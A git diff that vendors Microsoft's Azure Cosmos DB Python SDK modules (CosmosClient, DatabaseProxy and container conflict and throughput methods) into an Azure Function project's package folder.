+        return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"],
+                                    properties=throughput_properties[0])
+
+    @distributed_trace
+    def replace_throughput(self, throughput, **kwargs):
+        # type: (int, Any) -> ThroughputProperties
+        """Replace the container's throughput.
+
+        If no ThroughputProperties already exist for the container, an exception is raised.
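+
+        As a sketch (assuming ``container`` is an existing :class:`ContainerProxy`),
+        the current offer can be read and then replaced with a new value:
+
+        .. code-block:: python
+
+            current = container.get_throughput().offer_throughput
+            container.replace_throughput(current + 400)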
+ + :param throughput: The throughput to be set (an integer). + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: ThroughputProperties for the container, updated with new throughput. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container + or the throughput properties could not be updated. + :rtype: ~azure.cosmos.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = list(self.client_connection.QueryOffers(query_spec, **kwargs)) + if not throughput_properties: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find Offer for container " + self.container_link) + new_throughput_properties = throughput_properties[0].copy() + new_throughput_properties["content"]["offerThroughput"] = throughput + data = self.client_connection.ReplaceOffer( + offer_link=throughput_properties[0]["_self"], offer=throughput_properties[0], **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) + + @distributed_trace + def list_conflicts(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all the conflicts in the container. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of conflicts (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadConflicts( + collection_link=self.container_link, feed_options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_conflicts( + self, + query, # type: str + parameters=None, # type: Optional[List[str]] + enable_cross_partition_query=None, # type: Optional[bool] + partition_key=None, # type: Optional[Any] + max_item_count=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """Return all conflicts matching a given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param enable_cross_partition_query: Allows sending of more than one request to execute + the query in the Azure Cosmos DB service. + More than one request is necessary if the query is not scoped to single partition key value. + :param partition_key: Specifies the partition key value for the item. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of conflicts (dicts). 
+ :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if enable_cross_partition_query is not None: + feed_options["enableCrossPartitionQuery"] = enable_cross_partition_query + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + + result = self.client_connection.QueryConflicts( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def get_conflict(self, conflict, partition_key, **kwargs): + # type: (Union[str, Dict[str, Any]], Any, Any) -> Dict[str, Any] + """Get the conflict identified by `conflict`. + + :param conflict: The ID (name) or dict representing the conflict to retrieve. + :param partition_key: Partition key for the conflict to retrieve. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the retrieved conflict. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given conflict couldn't be retrieved. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + + result = self.client_connection.ReadConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def delete_conflict(self, conflict, partition_key, **kwargs): + # type: (Union[str, Dict[str, Any]], Any, Any) -> None + """Delete a specified conflict from the container. + + If the conflict does not already exist in the container, an exception is raised. + + :param conflict: The ID (name) or dict representing the conflict to be deleted. + :param partition_key: Partition key for the conflict to delete. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The conflict wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The conflict does not exist in the container. 
+ :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + + result = self.client_connection.DeleteConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/cosmos_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/cosmos_client.py new file mode 100644 index 0000000..18bed1f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/cosmos_client.py @@ -0,0 +1,478 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, and delete databases in the Azure Cosmos DB SQL API service. 
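+
+A minimal usage sketch of the client defined in this module (the URL and key
+are placeholders):
+
+.. code-block:: python
+
+    from azure.cosmos import CosmosClient
+
+    client = CosmosClient("https://<account>.documents.azure.com:443/", credential="<account-key>")
+    database = client.create_database_if_not_exists("mydb")
+    for properties in client.list_databases():
+        print(properties["id"])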
+""" + +from typing import Any, Dict, Optional, Union, cast, Iterable, List # pylint: disable=unused-import +import warnings +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from ._retry_utility import ConnectionRetryPolicy +from .database import DatabaseProxy +from .documents import ConnectionPolicy, DatabaseAccount +from .exceptions import CosmosResourceNotFoundError + +__all__ = ("CosmosClient",) + + +def _parse_connection_str(conn_str, credential): + # type: (str, Optional[Any]) -> Dict[str, str] + conn_str = conn_str.rstrip(";") + conn_settings = dict( # type: ignore # pylint: disable=consider-using-dict-comprehension + s.split("=", 1) for s in conn_str.split(";") + ) + if 'AccountEndpoint' not in conn_settings: + raise ValueError("Connection string missing setting 'AccountEndpoint'.") + if not credential and 'AccountKey' not in conn_settings: + raise ValueError("Connection string missing setting 'AccountKey'.") + return conn_settings + + +def _build_auth(credential): + # type: (Any) -> Dict[str, Any] + auth = {} + if isinstance(credential, str): + auth['masterKey'] = credential + elif isinstance(credential, dict): + if any(k for k in credential.keys() if k in ['masterKey', 'resourceTokens', 'permissionFeed']): + return credential # Backwards compatible + auth['resourceTokens'] = credential # type: ignore + elif hasattr(credential, '__iter__'): + auth['permissionFeed'] = credential + elif hasattr(credential, 'get_token'): + auth['clientSecretCredential'] = credential + else: + raise TypeError( + "Unrecognized credential type. Please supply the master key as a string " + "or a dictionary, or resource tokens, or a list of permissions, or any instance of a class implementing" + " TokenCredential (see azure.identity module for specific implementations such as ClientSecretCredential).") + return auth + + +def _build_connection_policy(kwargs): + # type: (Dict[str, Any]) -> ConnectionPolicy + # pylint: disable=protected-access + policy = kwargs.pop('connection_policy', None) or ConnectionPolicy() + + # Connection config + policy.RequestTimeout = kwargs.pop('request_timeout', None) or \ + kwargs.pop('connection_timeout', None) or \ + policy.RequestTimeout + policy.ConnectionMode = kwargs.pop('connection_mode', None) or policy.ConnectionMode + policy.ProxyConfiguration = kwargs.pop('proxy_config', None) or policy.ProxyConfiguration + policy.EnableEndpointDiscovery = kwargs.pop('enable_endpoint_discovery') \ + if 'enable_endpoint_discovery' in kwargs.keys() else policy.EnableEndpointDiscovery + policy.PreferredLocations = kwargs.pop('preferred_locations', None) or policy.PreferredLocations + policy.UseMultipleWriteLocations = kwargs.pop('multiple_write_locations', None) or \ + policy.UseMultipleWriteLocations + + # SSL config + verify = kwargs.pop('connection_verify', None) + policy.DisableSSLVerification = not bool(verify if verify is not None else True) + ssl = kwargs.pop('ssl_config', None) or policy.SSLConfiguration + if ssl: + ssl.SSLCertFile = kwargs.pop('connection_cert', None) or ssl.SSLCertFile + ssl.SSLCaCerts = verify or ssl.SSLCaCerts + policy.SSLConfiguration = ssl + + # Retry config + retry_options = kwargs.pop('retry_options', None) + if retry_options is not None: + warnings.warn("This option has been deprecated and will be removed from the SDK in a future release.", + DeprecationWarning) + retry_options = policy.RetryOptions + total_retries = 
kwargs.pop('retry_total', None) + retry_options._max_retry_attempt_count = total_retries or retry_options._max_retry_attempt_count + retry_options._fixed_retry_interval_in_milliseconds = kwargs.pop('retry_fixed_interval', None) or \ + retry_options._fixed_retry_interval_in_milliseconds + max_backoff = kwargs.pop('retry_backoff_max', None) + retry_options._max_wait_time_in_seconds = max_backoff or retry_options._max_wait_time_in_seconds + policy.RetryOptions = retry_options + connection_retry = kwargs.pop('connection_retry_policy', None) + if connection_retry is not None: + warnings.warn("This option has been deprecated and will be removed from the SDK in a future release.", + DeprecationWarning) + connection_retry = policy.ConnectionRetryConfiguration + if not connection_retry: + connection_retry = ConnectionRetryPolicy( + retry_total=total_retries, + retry_connect=kwargs.pop('retry_connect', None), + retry_read=kwargs.pop('retry_read', None), + retry_status=kwargs.pop('retry_status', None), + retry_backoff_max=max_backoff, + retry_on_status_codes=kwargs.pop('retry_on_status_codes', []), + retry_backoff_factor=kwargs.pop('retry_backoff_factor', 0.8), + ) + policy.ConnectionRetryConfiguration = connection_retry + + return policy + + +class CosmosClient(object): # pylint: disable=client-accepts-api-version-keyword + """A client-side logical representation of an Azure Cosmos DB account. + + Use this client to configure and execute requests to the Azure Cosmos DB service. + + :param str url: The URL of the Cosmos DB account. + :param credential: Can be the account key, or a dictionary of resource tokens. + :type credential: Union[str, Dict[str, str], ~azure.core.credentials.TokenCredential] + :param str consistency_level: Consistency level to use for the session. The default value is None (Account level). + :keyword int timeout: An absolute timeout in seconds, for the combined HTTP request and response processing. + :keyword int request_timeout: The HTTP request timeout in milliseconds. + :keyword str connection_mode: The connection mode for the client - currently only supports 'Gateway'. + :keyword proxy_config: Connection proxy configuration. + :paramtype proxy_config: ~azure.cosmos.ProxyConfiguration + :keyword ssl_config: Connection SSL configuration. + :paramtype ssl_config: ~azure.cosmos.SSLConfiguration + :keyword bool connection_verify: Whether to verify the connection, default value is True. + :keyword str connection_cert: An alternative certificate to verify the connection. + :keyword int retry_total: Maximum retry attempts. + :keyword int retry_backoff_max: Maximum retry wait time in seconds. + :keyword int retry_fixed_interval: Fixed retry interval in milliseconds. + :keyword int retry_read: Maximum number of socket read retry attempts. + :keyword int retry_connect: Maximum number of connection error retry attempts. + :keyword int retry_status: Maximum number of retry attempts on error status codes. + :keyword list[int] retry_on_status_codes: A list of specific status codes to retry on. + :keyword float retry_backoff_factor: Factor to calculate wait time between retry attempts. + :keyword bool enable_endpoint_discovery: Enable endpoint discovery for + geo-replicated database accounts. (Default: True) + :keyword list[str] preferred_locations: The preferred locations for geo-replicated database accounts. + + .. admonition:: Example: + + .. 
literalinclude:: ../samples/examples.py
+                :start-after: [START create_client]
+                :end-before: [END create_client]
+                :language: python
+                :dedent: 0
+                :caption: Create a new instance of the Cosmos DB client:
+                :name: create_client
+    """
+
+    def __init__(self, url, credential, consistency_level=None, **kwargs):
+        # type: (str, Any, Optional[str], Any) -> None
+        """Instantiate a new CosmosClient."""
+        auth = _build_auth(credential)
+        connection_policy = _build_connection_policy(kwargs)
+        self.client_connection = CosmosClientConnection(
+            url, auth=auth, consistency_level=consistency_level, connection_policy=connection_policy, **kwargs
+        )
+
+    def __repr__(self):  # pylint:disable=client-method-name-no-double-underscore
+        # type: () -> str
+        return "<CosmosClient [{}]>".format(self.client_connection.url_connection)[:1024]
+
+    def __enter__(self):
+        self.client_connection.pipeline_client.__enter__()
+        return self
+
+    def __exit__(self, *args):
+        return self.client_connection.pipeline_client.__exit__(*args)
+
+    @classmethod
+    def from_connection_string(cls, conn_str, credential=None, consistency_level=None, **kwargs):
+        # type: (str, Optional[Any], Optional[str], Any) -> CosmosClient
+        """Create a CosmosClient instance from a connection string.
+
+        The connection string can be retrieved from the Azure portal. For a full
+        list of optional keyword arguments, see the CosmosClient constructor.
+
+        :param str conn_str: The connection string.
+        :param credential: Alternative credentials to use instead of the key
+            provided in the connection string.
+        :type credential: str or dict(str, str)
+        :param Optional[str] consistency_level:
+            Consistency level to use for the session. The default value is None (Account level).
+        """
+        settings = _parse_connection_str(conn_str, credential)
+        return cls(
+            url=settings['AccountEndpoint'],
+            credential=credential or settings['AccountKey'],
+            consistency_level=consistency_level,
+            **kwargs
+        )
+
+    @staticmethod
+    def _get_database_link(database_or_id):
+        # type: (Union[DatabaseProxy, str, Dict[str, str]]) -> str
+        if isinstance(database_or_id, str):
+            return "dbs/{}".format(database_or_id)
+        try:
+            return cast("DatabaseProxy", database_or_id).database_link
+        except AttributeError:
+            pass
+        database_id = cast("Dict[str, str]", database_or_id)["id"]
+        return "dbs/{}".format(database_id)
+
+    @distributed_trace
+    def create_database(  # pylint: disable=redefined-builtin
+        self,
+        id,  # type: str
+        populate_query_metrics=None,  # type: Optional[bool]
+        offer_throughput=None,  # type: Optional[int]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> DatabaseProxy
+        """
+        Create a new database with the given ID (name).
+
+        :param id: ID (name) of the database to create.
+        :param int offer_throughput: The provisioned throughput for this offer.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource
+            has changed, and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A DatabaseProxy instance representing the new database.
+        :rtype: ~azure.cosmos.DatabaseProxy
+        :raises ~azure.cosmos.exceptions.CosmosResourceExistsError: Database with the given ID already exists.
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/examples.py
+                :start-after: [START create_database]
+                :end-before: [END create_database]
+                :language: python
+                :dedent: 0
+                :caption: Create a database in the Cosmos DB account:
+                :name: create_database
+        """
+
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            request_options["populateQueryMetrics"] = populate_query_metrics
+        if offer_throughput is not None:
+            request_options["offerThroughput"] = offer_throughput
+
+        result = self.client_connection.CreateDatabase(database=dict(id=id), options=request_options, **kwargs)
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers)
+        return DatabaseProxy(self.client_connection, id=result["id"], properties=result)
+
+    @distributed_trace
+    def create_database_if_not_exists(  # pylint: disable=redefined-builtin
+        self,
+        id,  # type: str
+        populate_query_metrics=None,  # type: Optional[bool]
+        offer_throughput=None,  # type: Optional[int]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> DatabaseProxy
+        """
+        Create the database if it does not exist already.
+
+        If the database already exists, the existing settings are returned.
+
+        .. note::
+            This function does not check or update existing database settings or
+            offer throughput if they differ from what is passed in.
+
+        :param id: ID (name) of the database to read or create.
+        :param bool populate_query_metrics: Enable returning query metrics in response headers.
+        :param int offer_throughput: The provisioned throughput for this offer.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource
+            has changed, and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A DatabaseProxy instance representing the database.
+        :rtype: ~azure.cosmos.DatabaseProxy
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The database read or creation failed.
+        """
+        try:
+            database_proxy = self.get_database_client(id)
+            database_proxy.read(
+                populate_query_metrics=populate_query_metrics,
+                **kwargs
+            )
+            return database_proxy
+        except CosmosResourceNotFoundError:
+            return self.create_database(
+                id,
+                populate_query_metrics=populate_query_metrics,
+                offer_throughput=offer_throughput,
+                **kwargs
+            )
+
+    def get_database_client(self, database):
+        # type: (Union[str, DatabaseProxy, Dict[str, Any]]) -> DatabaseProxy
+        """Retrieve an existing database with the ID (name) `id`.
+
+        :param database: The ID (name), dict representing the properties, or
+            `DatabaseProxy` instance of the database to read.
+        :type database: str or dict(str, str) or ~azure.cosmos.DatabaseProxy
+        :returns: A `DatabaseProxy` instance representing the retrieved database.
+        :rtype: ~azure.cosmos.DatabaseProxy
+        """
+        if isinstance(database, DatabaseProxy):
+            id_value = database.id
+        else:
+            try:
+                id_value = database["id"]
+            except TypeError:
+                id_value = database
+
+        return DatabaseProxy(self.client_connection, id_value)
+
+    @distributed_trace
+    def list_databases(
+        self,
+        max_item_count=None,  # type: Optional[int]
+        populate_query_metrics=None,  # type: Optional[bool]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> Iterable[Dict[str, Any]]
+        """List the databases in a Cosmos DB SQL database account.
+
+        :param int max_item_count: Max number of items to be returned in the enumeration operation.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of database properties (dicts).
+        :rtype: Iterable[dict[str, str]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            feed_options["populateQueryMetrics"] = populate_query_metrics
+
+        result = self.client_connection.ReadDatabases(options=feed_options, **kwargs)
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers)
+        return result
+
+    @distributed_trace
+    def query_databases(
+        self,
+        query=None,  # type: Optional[str]
+        parameters=None,  # type: Optional[List[str]]
+        enable_cross_partition_query=None,  # type: Optional[bool]
+        max_item_count=None,  # type: Optional[int]
+        populate_query_metrics=None,  # type: Optional[bool]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> Iterable[Dict[str, Any]]
+        """Query the databases in a Cosmos DB SQL database account.
+
+        :param str query: The Azure Cosmos DB SQL query to execute.
+        :param list[str] parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param bool enable_cross_partition_query: Allows sending of more than one request to execute
+            the query in the Azure Cosmos DB service.
+            More than one request is necessary if the query is not scoped to a single partition key value.
+        :param int max_item_count: Max number of items to be returned in the enumeration operation.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of database properties (dicts).
+        :rtype: Iterable[dict[str, str]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if enable_cross_partition_query is not None:
+            feed_options["enableCrossPartitionQuery"] = enable_cross_partition_query
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            feed_options["populateQueryMetrics"] = populate_query_metrics
+
+        if query:
+            # This is currently eagerly evaluated in order to capture the headers
+            # from the call.
+ # (just returning a generator did not initiate the first network call, so + # the headers were misleading) + # This needs to change for "real" implementation + query = query if parameters is None else dict(query=query, parameters=parameters) # type: ignore + result = self.client_connection.QueryDatabases(query=query, options=feed_options, **kwargs) + else: + result = self.client_connection.ReadDatabases(options=feed_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result + + @distributed_trace + def delete_database( + self, + database, # type: Union[str, DatabaseProxy, Dict[str, Any]] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> None + """Delete the database with the given ID (name). + + :param database: The ID (name), dict representing the properties or :class:`DatabaseProxy` + instance of the database to delete. + :type database: str or dict(str, str) or ~azure.cosmos.DatabaseProxy + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the database couldn't be deleted. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + + database_link = self._get_database_link(database) + self.client_connection.DeleteDatabase(database_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + + @distributed_trace + def get_database_account(self, **kwargs): + # type: (Any) -> DatabaseAccount + """Retrieve the database account information. + + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A `DatabaseAccount` instance representing the Cosmos DB Database Account. 
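For reference, a sketch of `query_databases` as implemented above, using a parameterized query; Cosmos SQL parameters are passed as a list of `{"name": ..., "value": ...}` dicts, and `client` plus the database name are assumed placeholders:

    databases = client.query_databases(
        query="SELECT * FROM root r WHERE r.id = @db_id",
        parameters=[{"name": "@db_id", "value": "orders"}],
    )
    for db_props in databases:
        print(db_props["id"])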
+ :rtype: ~azure.cosmos.DatabaseAccount + """ + response_hook = kwargs.pop('response_hook', None) + result = self.client_connection.GetDatabaseAccount(**kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/database.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/database.py new file mode 100644 index 0000000..0498d54 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/database.py @@ -0,0 +1,808 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Interact with databases in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, List, Dict, Union, cast, Iterable, Optional + +import warnings +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from .container import ContainerProxy +from .offer import ThroughputProperties +from .http_constants import StatusCodes +from .exceptions import CosmosResourceNotFoundError +from .user import UserProxy +from .documents import IndexingMode + +__all__ = ("DatabaseProxy",) + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class DatabaseProxy(object): + """An interface to interact with a specific database. + + This class should not be instantiated directly. Instead use the + :func:`CosmosClient.get_database_client` method. + + A database contains one or more containers, each of which can contain items, + stored procedures, triggers, and user-defined functions. + + A database can also have associated users, each of which is configured with + a set of permissions for accessing certain containers, stored procedures, + triggers, user-defined functions, or items. + + :ivar id: The ID (name) of the database. + + An Azure Cosmos DB SQL API database has the following system-generated + properties. These properties are read-only: + + * `_rid`: The resource ID. + * `_ts`: When the resource was last updated. The value is a timestamp. + * `_self`: The unique addressable URI for the resource. + * `_etag`: The resource etag required for optimistic concurrency control. 
+    * `_colls`: The addressable path of the collections resource.
+    * `_users`: The addressable path of the users resource.
+    """
+
+    def __init__(self, client_connection, id, properties=None):  # pylint: disable=redefined-builtin
+        # type: (CosmosClientConnection, str, Dict[str, Any]) -> None
+        """
+        :param CosmosClientConnection client_connection: Client from which this database was retrieved.
+        :param str id: ID (name) of the database.
+        """
+        self.client_connection = client_connection
+        self.id = id
+        self.database_link = u"dbs/{}".format(self.id)
+        self._properties = properties
+
+    def __repr__(self):
+        # type: () -> str
+        return "<DatabaseProxy [{}]>".format(self.database_link)[:1024]
+
+    @staticmethod
+    def _get_container_id(container_or_id):
+        # type: (Union[str, ContainerProxy, Dict[str, Any]]) -> str
+        if isinstance(container_or_id, str):
+            return container_or_id
+        try:
+            return cast("ContainerProxy", container_or_id).id
+        except AttributeError:
+            pass
+        return cast("Dict[str, str]", container_or_id)["id"]
+
+    def _get_container_link(self, container_or_id):
+        # type: (Union[str, ContainerProxy, Dict[str, Any]]) -> str
+        return u"{}/colls/{}".format(self.database_link, self._get_container_id(container_or_id))
+
+    def _get_user_link(self, user_or_id):
+        # type: (Union[UserProxy, str, Dict[str, Any]]) -> str
+        if isinstance(user_or_id, str):
+            return u"{}/users/{}".format(self.database_link, user_or_id)
+        try:
+            return cast("UserProxy", user_or_id).user_link
+        except AttributeError:
+            pass
+        return u"{}/users/{}".format(self.database_link, cast("Dict[str, str]", user_or_id)["id"])
+
+    def _get_properties(self):
+        # type: () -> Dict[str, Any]
+        if self._properties is None:
+            self._properties = self.read()
+        return self._properties
+
+    @distributed_trace
+    def read(self, populate_query_metrics=None, **kwargs):
+        # type: (Optional[bool], Any) -> Dict[str, Any]
+        """Read the database properties.
+
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :rtype: Dict[str, Any]
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given database couldn't be retrieved.
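A short sketch of reading database properties through the `DatabaseProxy` above (illustrative; `client` and the database name are assumed placeholders):

    db = client.get_database_client("orders")   # constructs a proxy; no request yet
    props = db.read()                           # GET dbs/orders
    print(props["id"], props["_etag"], props["_ts"])  # includes the system properties listed above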
+ """ + # TODO this helper function should be extracted from CosmosClient + from .cosmos_client import CosmosClient + + database_link = CosmosClient._get_database_link(self) + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + + self._properties = self.client_connection.ReadDatabase( + database_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def create_container( + self, + id, # type: str # pylint: disable=redefined-builtin + partition_key, # type: Any + indexing_policy=None, # type: Optional[Dict[str, Any]] + default_ttl=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + offer_throughput=None, # type: Optional[int] + unique_key_policy=None, # type: Optional[Dict[str, Any]] + conflict_resolution_policy=None, # type: Optional[Dict[str, Any]] + **kwargs # type: Any + ): + # type: (...) -> ContainerProxy + """Create a new container with the given ID (name). + + If a container with the given ID already exists, a CosmosResourceExistsError is raised. + + :param id: ID (name) of container to create. + :param partition_key: The partition key to use for the container. + :param indexing_policy: The indexing policy to apply to the container. + :param default_ttl: Default time to live (TTL) for items in the container. If unspecified, items do not expire. + :param offer_throughput: The provisioned throughput for this offer. + :param unique_key_policy: The unique key policy to apply to the container. + :param conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). 